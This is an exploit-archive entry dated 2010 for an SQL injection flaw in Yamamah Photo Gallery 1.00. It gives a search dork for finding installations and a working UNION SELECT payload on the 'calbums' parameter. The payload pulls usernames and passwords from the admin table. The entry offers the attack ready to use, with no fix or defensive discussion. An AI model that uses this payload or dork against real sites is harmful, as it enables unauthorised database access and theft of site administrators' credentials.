Yamamah Photo Gallery 1.00 SQL Injection Vulnerability (calbums)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Yamamah Photo Gallery 1.00 SQL Injection Vulnerability (calbums)
# Published : 2010-06-13
# Author : CoBRa_21
# Previous Title : Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure Vulnerability
# Next Title : Eyeland Studio Inc. (game.php) SQL Injection Vulnerability

##################################################################################################

Yamamah Photo Gallery 1.00 SQL Injection Vulnerability

##################################################################################################

Author : CoBRa_21

Script Home : http://www.yamamah.org/

Dork : "Powered By : Yamamah Version 1.00"

##################################################################################################

SQL Injection:

http://localhost/[path]/?calbums=-2 union select 0,1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12,13 from admin--

##################################################################################################